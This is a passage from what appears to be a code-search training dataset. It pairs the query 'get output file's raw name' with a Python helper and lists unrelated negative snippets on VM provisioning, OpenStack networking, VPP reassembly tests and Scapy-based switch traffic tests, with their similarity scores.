int(args.pop(0))\n elif arg in ('-d', '--desc'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n desc = args.pop(0)\n elif arg in ('-n', '--number'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n instances = int(args.pop(0))\n elif arg in ('-h', '--host'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n host = args.pop(0)\n elif arg in ('-c', '--cores'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n cores = int(args.pop(0))\n elif arg in ('-m', '--memory'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n memory = int(args.pop(0))\n elif arg == '--socket':\n socket = True\n elif arg == '--vlan':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n vlan = int(args.pop(0))\n elif arg == '--ntp':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n ntp_server = args.pop(0)\n elif arg == '--license':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n license_server = args.pop(0)\n elif arg == '--noshare':\n share = False\n elif arg == '--staticip':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n static_ip = args.pop(0)\n elif arg == '--netmask':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n netmask = args.pop(0)\n elif arg == '--gateway':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n gateway = args.pop(0)\n else:\n print('unrecognized option:', arg, file=sys.stderr)\n return\n\n if not vm_image:\n builds = self._qm.get_available_stc_builds()\n if not builds:\n print('unable to find latest build', file=sys.stderr)\n return\n vm_image = '#' + builds[0]\n\n try:\n vm_ids = self._qm.start_stc_vm(\n self._user, vm_image, ttl_minutes, socket, desc, instances,\n host, share, vlan, memory, cores, external, ntp_server,\n license_server, static_ip, netmask, gateway)\n except Exception as e:\n print('ERROR:', e, file=sys.stderr)\n return\n\n print('Started new vm instances of', vm_image)\n print('\\n'.join(vm_ids))", "def tcp_start(self, flow: mitmproxy.tcp.TCPFlow):", "def setUp(self):\n import protolibs.ics_servers as ics_servers\n from point import Point\n from configobj import ConfigObj\n\n # Get config file\n configfile = '/'.join(['sims', 'tcptank', 'config'])\n config=ConfigObj(infile=configfile, unrepr=True)\n self.config = config\n #Set global variable devconfig here \n devconfig=config['vdevs']['slave'] \n\n ##--Set up points\n points={}\n for p in devconfig['points']:\n points.update( { p['name'] : Point(**p) } ) \n #The ** treats the p dictionary as the arguments to the Point class\n self.server = ics_servers.ModbusTCP( devconfig['icsifaces'][0], points.values() )\n self.server.start()", "def _spawn_vapv(self, hostnames, lb):\n identifier = self.openstack_connector.get_identifier(lb)\n # Initialize lists of items to clean up if operation fails\n port_ids = []\n security_groups = []\n vms = []\n try: # For rolling back objects if failure occurs...\n # Create ports...\n ports = {}\n if cfg.CONF.lbaas_settings.management_mode == \"FLOATING_IP\":\n # Primary data port (floating IP)\n (port, sec_grp, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[0], create_floating_ip=True, cluster=True,\n identifier=identifier\n )\n ports[hostnames[0]] = {\n \"ports\": {\n \"data\": port,\n \"mgmt\": None\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": port['fixed_ips'][0]['ip_address']\n }\n port_ids.append(port['id'])\n security_groups = [sec_grp]\n # Secondary data port (floating IP)\n (port, junk, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[1], security_group=sec_grp,\n create_floating_ip=True, cluster=True\n )\n ports[hostnames[1]] = {\n \"ports\": {\n \"data\": port,\n \"mgmt\": None\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": port['fixed_ips'][0]['ip_address']\n }\n port_ids.append(port['id'])\n elif cfg.CONF.lbaas_settings.management_mode == \"MGMT_NET\":\n # Primary data port (management network)\n (data_port, data_sec_grp, junk) = self.openstack_connector.create_port(\n lb, hostnames[0], cluster=True, identifier=identifier\n )\n # Primary mgmt port (management network)\n (mgmt_port, mgmt_sec_grp, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[0], mgmt_port=True, cluster=True, identifier=identifier\n )\n ports[hostnames[0]] = {\n \"ports\": {\n \"data\": data_port,\n \"mgmt\": mgmt_port\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": mgmt_ip\n }\n security_groups = [data_sec_grp, mgmt_sec_grp]\n port_ids.append(data_port['id'])\n port_ids.append(mgmt_port['id'])\n # Secondary data port (management network)\n (data_port, sec_grp, junk) = self.openstack_connector.create_port(\n lb, hostnames[1], security_group=data_sec_grp, cluster=True\n )\n # Secondary mgmt port (management network)\n (mgmt_port, junk, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[1], mgmt_port=True, security_group=mgmt_sec_grp,\n cluster=True\n )\n ports[hostnames[1]] = {\n \"ports\": {\n \"data\": data_port,\n \"mgmt\": mgmt_port\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": mgmt_ip\n }\n port_ids.append(data_port['id'])\n port_ids.append(mgmt_port['id'])\n\n # Create instances...\n try:\n bandwidth = lb.bandwidth\n if bandwidth == 0:\n raise AttributeError()\n except AttributeError:\n bandwidth = self._get_setting(\n lb.tenant_id, \"services_director_settings\", \"bandwidth\"\n )\n avoid = None\n for host in hostnames:\n # Launch vAPV...\n vm = self.openstack_connector.create_vapv(\n host, lb, ports[host]['ports'], avoid\n )\n vms.append(vm['id'])\n # Set params for next iteration...\n if cfg.CONF.lbaas_settings.allow_different_host_hint is True:\n avoid = vm['id']\n\n except Exception as e:\n if cfg.CONF.lbaas_settings.roll_back_on_error is True:\n self.openstack_connector.clean_up(\n instances=vms,\n security_groups=security_groups,\n ports=port_ids\n )\n raise e", "def run(host, tasks, procsPerTask, memFracPerTask, outputLoc, primaryIP, allocation,\n instance, localIP):\n argStr = ' '.join(sys.argv[1:])\n #argStr = ' '.join([str(i) for i in locals().values()]) # do not move this line.\n #TODO: Determine logDir value.\n logDir = \"\"\n\n #os.system(\"sleep 15\")\n os.system(\"python {0} {1} &\".format(join(dirname(__file__), \"networking.py\"), argStr))\n os.system(\"sleep 20\")\n port = 13001\n buf = 1024\n tcpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n m_addr = (primaryIP, port)\n tcpsocket.connect(m_addr)\n register_command = \"register\\t{0}\\t{1}\".format(host, tasks)\n os.system(\"echo {0} >> {1}\".format(register_command, join(logDir, \"sent.log\")))\n tcpsocket.send(register_command)\n tcpsocket.close()", "def test_start_vms(self):\n testflow.step(\"Check if VM's started on different hosts\")\n assert (\n ll_vms.get_vm_host(vm_name=conf.VM_NAME[0]) !=\n ll_vms.get_vm_host(vm_name=conf.VM_NAME[1])\n )", "def test_otoroshi_controllers_adminapi_templates_controller_initiate_tcp_service_tcp(self):\n pass", "def setUp(self):\n super().setUp()\n for intf in self.send_ifs:\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=intf.sw_if_index, enable_ip4=True\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10000,\n )", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index,\n enable_ip4=True,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10000,\n )", "def __init__(self, name=None, start=True, *args, **kwargs):\n name = \"VM_TEMPL_1\" if name is None else name\n super(MgmtVM, self).__init__(name=name, start=start, *args, **kwargs)\n\n #self.add_proc(rift.vcs.MsgBrokerTasklet())\n self.add_proc(rift.vcs.DtsRouterTasklet())\n self.add_proc(rift.vcs.DtsPerfTasklet())\n #self.add_proc(rift.vcs.LogdTasklet())\n\n self.add_proc(rift.vcs.procs.RiftCli());\n\n #Confd would need RestConf present\n self.add_proc(rift.vcs.uAgentTasklet())\n #self.add_proc(rift.vcs.Confd())\n self.add_proc(rift.vcs.RestconfTasklet())\n self.add_proc(rift.vcs.Watchdog())\n self.add_proc(RedisServer())\n\n #self.add_proc(rift.vcs.Webserver())\n #self.add_proc(rift.vcs.RedisCluster())", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index,\n enable_ip6=True,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10,\n is_ip6=1,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10000,\n is_ip6=1,\n )", "def test_ft_VxLAN_TrafficMultiAVPNVP(topology,\n testlog,\n config,\n get_switch_mac,\n get_host_macs,\n traffic_permutation,\n l2_basic_phy,\n l3_basic_phy):\n\n \"\"\"\n Step: Create the topology as shown\n Result: Topology created successfully\n \"\"\"\n testlog.log_step(\"Set up the switch and hosts\")\n s1 = topology.get('ops1')\n h1 = topology.get('hs1')\n h2 = topology.get('hs2')\n h3 = topology.get('hs3')\n h4 = topology.get('hs4')\n\n argv = generate_params(s1)\n\n \"\"\"\n Step: Configure the topology as shown\n Result: Topology has been configured successfully\n \"\"\"\n # Configuring VLAN and four interfaces on switch 1\n testlog.log_subheader(\"Creating L2 Interfaces\")\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][0]],\n argv['vlan_ids'][0],\n None, testlog)\n\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][1]],\n argv['vlan_ids'][0],\n None, testlog)\n\n testlog.log_subheader(\"Creating SVIs\")\n # Creating SVI interfaces of if03 and if04\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][2]],\n argv['vlan_ids'][1],\n None, testlog)\n\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][3]],\n argv['vlan_ids'][2],\n None, testlog)\n\n configure_switch_vlan(s1,\n argv['vlan_ids'][1],\n S1_SVI_IP_1 + '/' + MASK,\n [argv['phy_ports'][2]])\n\n configure_switch_vlan(s1,\n argv['vlan_ids'][2],\n S1_SVI_IP_2 + '/' + MASK,\n [argv['phy_ports'][3]])\n\n testlog.log_subheader(\"Creating Switch Loopback Interface\")\n # Creating a loopback interface on s1\n config.create_l3_loopback(s1,\n '0',\n S1_LO_IP + '/' + MASK)\n\n testlog.log_subheader(\"Configure Host IPs\")\n configure_host_ips(h3, h4, argv['ip_address_hs'])\n\n testlog.log_subheader(\"Configuring IP Routes from NVPs to 20.0.0.2\")\n config.switch_add_route(s1, VTEP_PEER_IP, DEST_MASK, H3_IP)\n config.switch_add_route(s1, VTEP_PEER_IP, DEST_MASK, H4_IP)\n\n \"\"\"\n Step: Configure VxLAN interface on switch 1\n Result: VxLAN interface has been configured successfully\n \"\"\"\n testlog.log_step(\"Configure VXLAN\")\n config.configure_vxlan(s1,\n TUN_NUM,\n S1_LO_IP,\n argv['vnis'])\n testlog.log_subheader(\"Current Running Configuration\")\n s1.libs.vtysh.show_running_config()\n\n \"\"\"\n Step: Generate traffic type using Scapy on all hosts\n Result: Traffic successfully created\n \"\"\"\n testlog.log_step(\"Start Scapy on hosts\")\n # Starting scapy\n start_stop_scapy_on_hosts(h1)\n start_stop_scapy_on_hosts(h2)\n start_stop_scapy_on_hosts(h3)\n start_stop_scapy_on_hosts(h4)\n\n \"\"\"\n Step: Use scapy to configure the traffic from AVP to all hosts\n Result: Packet created\n \"\"\"\n # Configure Scapy on hs1 for AVP-->All traffic\n step_desc = \"Configure traffic from AVP1\"\n testlog.log_step(step_desc)\n\n cur_src_MAC = AVP_MAC\n cur_dst_MAC = NVP_MAC\n packet_avp = scapy_configuration_avp(h1, pkt_type=PKT_TYPE,\n macsrc=cur_src_MAC, macdst=cur_dst_MAC)\n\n \"\"\"\n Step: Transmit the traffic from AVP to all hosts and\n parse the captured packet to check\n if the packet is received as expected\n Result: Traffic transmitted successfully and\n Correct values received\n \"\"\"\n\n # Updating step_desc based on traffic type\n if (PKT_TYPE == \"l2_basic\"):\n step_desc = \"Transmit from AVP1 (Packet Type: Unknown Unicast)\\n\" + \\\n \"\\t Intended Receivers: AVP2, NVP1/NVP2\"\n else:\n step_desc = \"Transmit from AVP1 (Packet Type: {})\\n\".format(PKT_TYPE) + \\\n \"\\t Intended Receivers: AVP2, NVP1/NVP2\"\n\n testlog.log_step(step_desc)\n\n # Dictionary of Booleans for each host\n # True means Packet expected at host and False: Packets not expected at host\n pkts_expected_dict = {\"AVP1\": False, \"AVP2\": True, \"ECMP group\": True}\n # Sending traffic from AVP h1 to all other hosts\n with ThreadGroup() as ctx:\n # Sniffing on hs2 (AVP)\n ctx.run(sniff_traffic, hs=h2, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"AVP2 (h2)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs3 (NVP)\n ctx.run(sniff_traffic, hs=h3, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"NVP1 (h3)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs4 (NVP)\n ctx.run(sniff_traffic, hs=h4, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"NVP2 (h4)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n ctx.run(start_traffic, hs=h1, packet=packet_avp, count=PKT_COUNT)\n\n # Checking Transmission Results\n print_transmission_results(pkts_expected_dict, PKT_COUNT, testlog)\n\n print(RECEIVED_PKT_DICT)\n RECEIVED_PKT_DICT.clear()\n\n \"\"\"\n Step: Check if MAC is learnt as expected\n Result: Source MAC is present in switch MAC table\n \"\"\"\n testlog.log_step(\"Check MAC Learning\")\n # Verifying if MAC A was learned on if01\n verify_mac = retry(\n stop_max_attempt_number=3,\n wait_fixed=1000)(verify_mac_table)\n verify_mac(sw1=s1, mac=cur_src_MAC, exp_port=argv['phy_ports'][0],\n exp_vlan=VLAN1, vtep_peer=None)\n\n # Update src MAC and dst MAC based on packet type\n dst_MAC_dict = {\"l2_basic\": AVP1_MAC, \"stp\": STP_DEST_MAC,\n \"broadcast\": BROADCAST_MAC, \"multicast\": MULTICAST_MAC,\n \"lldp\": LLDP_MAC}\n\n cur_src_MAC = NVP1_MAC\n cur_dst_MAC = dst_MAC_dict[PKT_TYPE]\n\n \"\"\"\n Step: Use scapy to configure the traffic for NVP to all hosts\n Result: Packet created\n \"\"\"\n step_desc = \"Configure traffic from NVP1\"\n testlog.log_step(step_desc)\n\n # Configure Scapy on hs1 for NVP-->All traffic\n packet_nvp = scapy_configuration_nvp(h3, pkt_type=PKT_TYPE,\n inner_macsrc=cur_src_MAC,\n inner_macdst=cur_dst_MAC, vni=VNI,\n src_port=UDP_SPORT, dst_port=UDP_DPORT,\n src_IP=SRC_IP, dst_IP=DST_IP,\n outer_macsrc=OUTER_SRC_MAC,\n outer_macdst=OUTER_DST_MAC)\n\n \"\"\"\n Step: Transmit the traffic from NVP to all hosts and\n parse the captured packet to check\n if the packet is received as expected\n Result: Traffic transmitted successfully and\n Correct values received\n \"\"\"\n # Updating step_desc based on traffic type\n if (PKT_TYPE == \"l2_basic\"):\n step_desc = \"Transmit from NVP1 (Packet Type: Known Unicast)\\n\" + \\\n \"\\t Intended Receivers: AVP1\"\n else:\n step_desc = \"Transmit from NVP1 (Packet Type: {})\\n\".format(PKT_TYPE) + \\\n \"\\t Intended Receivers: AVP1, AVP2\"\n testlog.log_step(step_desc)\n\n # If broadcast, multicast or BPDU, packet is flooded to both AVPs\n pkts_expected_dict = {\"AVP1\": True, \"AVP2\": True, \"ECMP group\": False}\n\n # If l2 basic, packet is known unicast packet and only received at AVP1\n if (PKT_TYPE == \"l2_basic\"):\n pkts_expected_dict = {\"AVP1\": True, \"AVP2\": False, \"ECMP group\": False}\n\n # Sending traffic from NVP1 h3 to all other hosts\n with ThreadGroup() as ctx:\n # Sniffing on h1 (AVP1)\n ctx.run(sniff_traffic, hs=h1, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"AVP1 (h1)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on h2 (AVP2)\n ctx.run(sniff_traffic, hs=h2, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"AVP2 (h2)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on h4 (NVP2)\n ctx.run(sniff_traffic, hs=h4, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"NVP2 (h4)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n ctx.run(start_traffic, hs=h3, packet=packet_nvp, count=PKT_COUNT)\n\n # Checking Transmission Results\n print_transmission_results(pkts_expected_dict, PKT_COUNT, testlog)\n print(RECEIVED_PKT_DICT)\n RECEIVED_PKT_DICT.clear()\n\n \"\"\"\n Step: Check if MAC is learnt as expected\n Result: Source MAC is present in switch MAC table\n \"\"\"\n\n testlog.log_step(\"Check MAC Learning\")\n # Verifying if NVP1_MAC was learned on interface vxlan 1\n verify_mac(sw1=s1, mac=cur_src_MAC, exp_port=\"vxlan1\",\n exp_vlan=VLAN1, vtep_peer=VTEP_PEER_IP)\n\n \"\"\"\n Step: Transmit the traffic from NVP to all hosts and\n parse the captured packet to check\n if the packet is received as expected\n Result: Traffic transmitted successfully and\n Correct values received\n \"\"\"\n # Updating step_desc based on traffic type\n step_desc = \"Transmit from AVP1. Permuting Source MAC to Test ECMP Load Balancing\"\n testlog.log_step(step_desc)\n\n # If broadcast, multicast or BPDU, packet is sent to AVP2 and ECMP group\n pkts_expected_dict = {\"AVP1\": False, \"AVP2\": True, \"ECMP group\": True}\n\n # If l2 basic, packet is known unicast packet and only received at ECMP group\n if (PKT_TYPE == \"l2_basic\"):\n pkts_expected_dict = {\"AVP1\": True, \"AVP2\": False, \"ECMP group\": True}\n\n # Creating a list of potential source MACs\n lst_source_macs = ['00:00:00:00:00:{}'.format(\n i) for i in range(21, 21+TOTAL_MACS)]\n cur_src_MAC = lst_source_macs\n cur_dst_MAC = NVP_MAC\n\n packet_avp_lst = scapy_configuration_avp(h1, pkt_type=PKT_TYPE,\n macsrc=cur_src_MAC, macdst=cur_dst_MAC)\n\n with ThreadGroup() as ctx:\n # Sniffing on hs2 (AVP)\n ctx.run(sniff_traffic, hs=h2, count=TOTAL_MACS+10, timeout=LONG_TIMEOUT,\n recipient_type=\"AVP2 (h2)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs3 (NVP)\n ctx.run(sniff_traffic, hs=h3, count=TOTAL_MACS+10, timeout=LONG_TIMEOUT,\n recipient_type=\"NVP1 (h3)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs4 (NVP)\n ctx.run(sniff_traffic, hs=h4, count=TOTAL_MACS+10, timeout=LONG_TIMEOUT,\n recipient_type=\"NVP2 (h4)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n ctx.run(start_traffic, hs=h1, packet=packet_avp_lst, count=1)\n\n print(RECEIVED_PKT_DICT)\n\n # Call check_load_balancing helper function to\n check_load_balancing(testlog)\n\n RECEIVED_PKT_DICT.clear()\n testlog.log_step(\"Stop Scapy on hosts\")\n # Stopping scapy\n start_stop_scapy_on_hosts(h1, action='stop')\n start_stop_scapy_on_hosts(h2, action='stop')\n start_stop_scapy_on_hosts(h3, action='stop')\n start_stop_scapy_on_hosts(h4, action='stop')", "def dvs_ping_without_fip(self):\n self.show_step(1)\n self.env.revert_snapshot(\"dvs_vcenter_systest_setup\")\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n os_ip = self.fuel_web.get_public_vip(cluster_id)\n os_conn = os_actions.OpenStackActions(\n os_ip, SERVTEST_USERNAME,\n SERVTEST_PASSWORD,\n SERVTEST_TENANT)\n\n tenant = os_conn.get_tenant(SERVTEST_TENANT)\n\n # Create security group with rules for ssh and ping\n security_group = os_conn.create_sec_group_for_ssh()\n\n _s_groups = os_conn.neutron.list_security_groups()['security_groups']\n _srv_tenat = os_conn.get_tenant(SERVTEST_TENANT).id\n default_sg = [sg for sg in _s_groups\n if sg['tenant_id'] == _srv_tenat and\n sg['name'] == 'default'][0]\n\n self.show_step(2)\n logger.info('Create network {}'.format(self.net_data[0].keys()[0]))\n net_1 = os_conn.create_network(network_name=self.net_data[0].keys()[0],\n tenant_id=tenant.id)['network']\n\n self.show_step(3)\n subnet = os_conn.create_subnet(\n subnet_name=net_1['name'],\n network_id=net_1['id'],\n cidr=self.net_data[0][self.net_data[0].keys()[0]],\n ip_version=4)\n\n # Check that network are created.\n assert_true(os_conn.get_network(net_1['name'])['id'] == net_1['id'])\n\n # Create Router_01, set gateway and add interface to external network\n router_1 = os_conn.create_router('router_1', tenant=tenant)\n\n self.show_step(4)\n os_conn.add_router_interface(router_id=router_1[\"id\"],\n subnet_id=subnet[\"id\"])\n\n access_point, access_point_ip = openstack.create_access_point(\n os_conn=os_conn,\n nics=[{'net-id': net_1['id']}],\n security_groups=[security_group.name, default_sg['name']])\n\n self.show_step(5)\n self.show_step(6)\n openstack.create_instances(os_conn=os_conn,\n nics=[{'net-id': net_1['id']}],\n vm_count=1,\n security_groups=[default_sg['name']])\n openstack.verify_instance_state(os_conn)\n\n # Get private ips of instances\n instances = [instance for instance in os_conn.get_servers()\n if instance.id != access_point.id]\n ips = [os_conn.get_nova_instance_ip(i, net_name=net_1['name'])\n for i in instances]\n\n self.show_step(7)\n ip_pair = dict.fromkeys(ips)\n for key in ip_pair:\n ip_pair[key] = [self.external_ip]\n openstack.check_connection_through_host(access_point_ip, ip_pair)", "def begin_sending_packets():\n monitoru = main_monitoring.MainMonitoring()\n monitoru.start_monitor_loop()", "def test_06_migrate_vm_live_attach_disk(self):\n \n global vm\n global data_disk_1\n data_disk_1 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_1.id)\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n data_disk_1\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n self.volume\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index, enable_ip4=True\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10000,\n )", "def test_traffic_paging_flow(self):\n # Need to delete all default flows in table 0 before\n # install the specific flows test case.\n self.classifier_controller._delete_all_flows()\n\n ue_ip_addr = \"192.168.128.30\"\n self.classifier_controller.install_paging_flow(\n 200,\n IPAddress(version=IPAddress.IPV4, address=ue_ip_addr.encode('utf-8')),\n True,\n )\n # Create a set of packets\n pkt_sender = ScapyPacketInjector(self.BRIDGE)\n eth = Ether(dst=self.MAC_1, src=self.MAC_2)\n ip = IP(src=self.Dst_nat, dst='192.168.128.30')\n o_udp = UDP(sport=2152, dport=2152)\n i_udp = UDP(sport=1111, dport=2222)\n i_tcp = TCP(seq=1, sport=1111, dport=2222)\n i_ip = IP(src='192.168.60.142', dst=self.EnodeB_IP)\n\n gtp_packet_udp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=28, gtp_type=255) / i_ip / i_udp\n gtp_packet_tcp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=68, gtp_type=255) / i_ip / i_tcp\n\n # Check if these flows were added (queries should return flows)\n flow_queries = [\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(tunnel_id=1, in_port=32768),\n ),\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(ipv4_dst='192.168.128.30'),\n ),\n ]\n # =========================== Verification ===========================\n # Verify 2 flows installed for classifier table (2 pkts matched)\n\n flow_verifier = FlowVerifier(\n [\n FlowTest(\n FlowQuery(\n self._tbl_num,\n self.testing_controller,\n ), 2, 2,\n ),\n ], lambda: wait_after_send(self.testing_controller),\n )\n\n snapshot_verifier = SnapshotVerifier(\n self, self.BRIDGE,\n self.service_manager,\n )\n\n with flow_verifier, snapshot_verifier:\n pkt_sender.send(gtp_packet_udp)\n pkt_sender.send(gtp_packet_tcp)\n\n flow_verifier.verify()" ]
[ "0.7372693", "0.59777474", "0.58827966", "0.5760567", "0.5757512", "0.5692496", "0.5627953", "0.5596239", "0.5572661", "0.5571036", "0.55461", "0.55419725", "0.55401415", "0.5530725", "0.552947", "0.55276793", "0.5517556", "0.5503944", "0.54876393", "0.5487193", "0.5486951", "0.5484048", "0.54690367", "0.54651725", "0.5461554", "0.54597443", "0.5455941", "0.54485464", "0.54461366", "0.5440754" ]
0.664063
1
get output file's raw name, without .txt or .csv
def get_output_raw_name(journal_file_name, output_type='txt'): dot_pos = journal_file_name.rfind('.') if dot_pos != -1: output_file_name = journal_file_name[0: dot_pos] else: output_file_name = journal_file_name num_of_output = 1 if output_type == 'txt': while True: output_file = '%s_%d.txt'%(output_file_name,num_of_output) if not os.path.exists(output_file): break else: num_of_output += 1 else: output_file = '%s.%s'%(output_file_name,output_type) return output_file
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getOutputFilename(self, filename):\n return filename[:-4] + \".txt\"", "def get_file_name(self):\n return str(self.get_file())", "def _get_output_filename(dataset_dir, split_name):\n return '%s/%s*.tfrecord' % (dataset_dir, split_name)", "def _get_raw_output_fp(self, output_dir, params):\r\n return join(output_dir, 'raw_output.txt')", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n #return Path(dir) / filename\n return filename", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n # return Path(dir) / filename\n return filename", "def get_filename(output_dir, accountname):\n f_name = 'twitter_data_' + accountname + str(datetime.datetime.utcnow()) + '.csv'# start_time + '_' + end_time\n full_path = output_dir + '/' + f_name\n\n return full_path", "def get_output_file_type(self):\n file_name = '.' + self.template_file_name.split('.')[-2]\n return file_name", "def out_filename(self, filetype, dir, format='old'):\n filename = self.filename(filetype=filetype, format=format)\n return Path(dir) / filename", "def _get_output_filename(dataset_dir, split_name):\n return '%s/fer_%s.tfrecord' % (dataset_dir, split_name)", "def _get_output_filename(dataset_dir, split_name):\n return '%s/cifar100_%s.tfrecord' % (dataset_dir, split_name)", "def get_output_file(path):\n root, _ = os.path.splitext(path)\n return os.path.basename(root) + get_task_number() + \".txt\"", "def filename(self):\n translator = {ord(\" \"): \"_\", ord(\",\"): None}\n return f'{self._full_name.translate(translator)}.txt'", "def _get_raw_output_fp(self,\r\n output_dir,\r\n params):\r\n return join(output_dir, 'bwa_raw_out.sam')", "def _get_raw_output_fp(self,\r\n output_dir,\r\n params):\r\n return join(output_dir, 'out.uc')", "def get_file_name(self):\n return self.path.name[6:]", "def GetFileName():\r\n d = GetData()\r\n return d.filename", "def 